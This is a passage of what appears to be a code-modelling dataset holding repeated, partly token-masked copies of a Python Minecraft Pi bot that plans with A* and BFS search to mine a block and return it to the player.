        return self._block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot has the block.\"\"\"\n
        return state.contains(self._block_id)\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions():\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
class _ReturnProblem(SearchProblem):\n
    \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. 
If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the 
list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a 